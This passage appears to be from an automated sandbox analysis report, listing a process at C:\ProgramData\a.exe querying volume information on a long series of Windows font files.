Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation	Jump to behavior
